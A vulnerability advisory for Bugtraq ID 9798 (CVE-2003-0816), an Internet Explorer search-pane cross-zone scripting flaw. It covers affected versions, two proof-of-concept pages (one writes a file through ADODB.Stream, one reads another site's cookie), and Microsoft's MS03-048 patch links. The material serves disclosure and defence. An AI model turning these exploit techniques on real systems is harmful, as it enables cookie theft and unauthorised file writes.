Microsoft Internet Explorer window.open Search Pane Cross-Zone Scripting Vulnerability
BID:9798
Info
| Bugtraq ID: | 9798 |
| Class: | Design Error |
| CVE: | CVE-2003-0816 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 10 2003 12:00AM |
| Updated: | Jul 12 2009 03:06AM |
| Credit: | Discovery of this issue is credited to Liu Die Yu. |
| Vulnerable: | Microsoft Internet Explorer 5.0.1 SP4; 5.0.1 SP3; 5.0.1 SP2; 5.0.1 SP1; 5.0.1; 6.0 SP1; 6.0; 5.5 SP2; 5.5 SP1; 5.5; 5.0 |
| Not Vulnerable: | |
Discussion
A vulnerability has been reported in Microsoft Internet Explorer that could allow malicious scripts and Active Content to access document properties across Security Zones and foreign domains. The issue is exposed when a search pane is opened via the window.open method (the "_search" target): script code running in the opener can then access the properties of a foreign-domain document loaded within the search pane, because a later navigation of that pane to a script URL executes in the context of the document already loaded there.
Exploitation of this issue could enable various attacks, such as cookie theft from an arbitrary domain. Other issues, such as those additionally described in BID 8577, may also facilitate execution of arbitrary code on a vulnerable client system.
It should be noted that support for the search pane was introduced in Internet Explorer 5.
This issue was originally described in BID 8577 "Multiple Microsoft Internet Explorer Script Execution Vulnerabilities".
Exploit / POC
The following examples were provided:
---------------------------CrossZone.htm---------------------------
<script>
window.open("http://wrong_site_add/","_search") //To load "Friendly HTTP error messages" page
// cause it's in My Computer Zone.
setTimeout(function(){
// '\\42' -> '\42' -> ' " '
img_src='javascript:file = \\42Exploit.txt\\42; o = new ActiveXObject(\\42ADODB.Stream\\42);'
+ ' o.Open(); o.Type=2; o.Charset=\\42ascii\\42; o.WriteText(\\42My name is Cheng Peng Su.\\42);'
+ ' o.SaveToFile(file, 2); o.Close(); alert(\\42I wanna create \\42+file+\\42 on your desktop!\\42);';
inject_html="<img src='" + img_src + "'>";
window.open('file:javascript:document.write("' + inject_html + '")','_search');
},5000);
</script>
-------------------------------End---------------------------------
---------------------------CrossSite.htm---------------------------
<script>
window.open("http://www.google.com/","_search")
setTimeout(function(){
window.open("file:javascript:alert(document.cookie);","_search")
},5000);
</script>
-------------------------------End---------------------------------
Examples are also available on the following web pages:
http://www.freewebs.com/applesoup/CrossBar/CrossSiteSB.htm
http://www.freewebs.com/applesoup/CrossBar/CrossZoneSB.htm
The original proof-of-concept is available at the following location:
http://www.safecenter.net/liudieyu/WsFakeSrc/WsFakeSrc-MyPage.HTM
Solution / Fix
Solution:
This issue has been addressed by Microsoft Security Bulletin MS03-048.

Microsoft Internet Explorer 6.0 SP1
- Microsoft Cumulative Security Update for Internet Explorer 6 Service Pack 1 (KB824145)
  http://www.microsoft.com/downloads/details.aspx?FamilyId=9D8543E9-0E2B-46C9-B6C6-12DE03860465&displaylang=en
- Microsoft Cumulative Security Update for Internet Explorer 6 SP1 64-bit Edition (KB824145)
  http://www.microsoft.com/downloads/details.aspx?FamilyId=35F99CF5-3629-4E0E-BF60-24845D2D20C9&displaylang=en
- Microsoft Cumulative Security Update for Internet Explorer for Windows Server 2003 (KB824145)
  http://www.microsoft.com/downloads/details.aspx?FamilyId=7D0D02DD-8940-48E0-B163-3FCDCB558F21&displaylang=en
- Microsoft Cumulative Security Update for Internet Explorer for Windows Server 2003 64-bit Edition (KB824145)
  http://www.microsoft.com/downloads/details.aspx?FamilyId=8BEFA1EC-0C48-4B65-989D-58B0CE1E6F95&displaylang=en

Microsoft Internet Explorer 5.5 SP2
- Microsoft Cumulative Security Update for Internet Explorer 5.5 Service Pack 2 (KB824145)
  http://www.microsoft.com/downloads/details.aspx?FamilyId=E438AFD4-DF70-448C-8925-1075C8BE6C5E&displaylang=en

Microsoft Internet Explorer 6.0
- Microsoft Cumulative Security Update for Internet Explorer 6 (KB824145)
  http://www.microsoft.com/downloads/details.aspx?FamilyId=4C4D22F0-FBF7-4EA6-9CC2-27D104D4198E&displaylang=en

Microsoft Internet Explorer 5.0.1, 5.0.1 SP1, 5.0.1 SP2, 5.0.1 SP3
- Microsoft Cumulative Security Update for Internet Explorer 5.01 for Windows 2000 Service Pack 2 (KB824145)
  For Internet Explorer 5.01 on Windows 2000 SP2
  http://www.microsoft.com/downloads/details.aspx?FamilyId=221616D4-5893-4DA4-A223-B0DE548D6D83&displaylang=en
- Microsoft Cumulative Security Update for Internet Explorer 5.01 for Windows 2000 Service Pack 3 (KB824145)
  For Internet Explorer 5.01 on Windows 2000 SP3
  http://www.microsoft.com/downloads/details.aspx?FamilyId=F4853D8F-F66C-4D8A-9979-3B4F540F90A8&displaylang=en
- Microsoft Cumulative Security Update for Internet Explorer 5.01 for Windows 2000 Service Pack 4 (KB824145)
  For Internet Explorer 5.01 on Windows 2000 SP4
  http://www.microsoft.com/downloads/details.aspx?FamilyId=C15E2DB3-14E2-43A4-A1A1-676374B66517&displaylang=en
References
References:
- Internet Explorer Cross Zone/Site Scripting Vulnerability (Cheng Peng Su)
- Microsoft Security Bulletin MS03-048 (Microsoft)
- MSIE->WsFakeSrc (Liu Die Yu)
- RE: New Internet Explorer Cross Zone/Site Scripting Vulnerability (Thor Larholm)